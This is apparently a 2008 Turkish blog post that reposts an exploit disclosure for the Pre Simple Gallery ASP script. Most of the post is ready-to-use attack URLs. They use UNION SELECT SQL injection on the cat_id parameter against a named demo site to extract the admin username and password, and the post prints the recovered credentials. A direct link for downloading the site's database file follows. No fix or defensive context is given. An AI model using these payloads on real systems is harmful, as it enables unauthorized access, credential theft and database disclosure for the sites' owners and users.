"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

22 Aralık 2008 Pazartesi

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns



link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt

link 2: http://www.exploiter5.com/all.php?id=46

Discovered By: ZoRLu

exploit for demo:

you go this link:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin

right click to on photo and you must see

http://preproject.com/pgallery/pimages/4

column number 4

and you goo this links

username:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

password:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

so for demo:

username: admin

password: admin


exp for demo: (DD)

http://preproject.com/pgallery/database/photo.mdb

0 yorum:

 
Dizi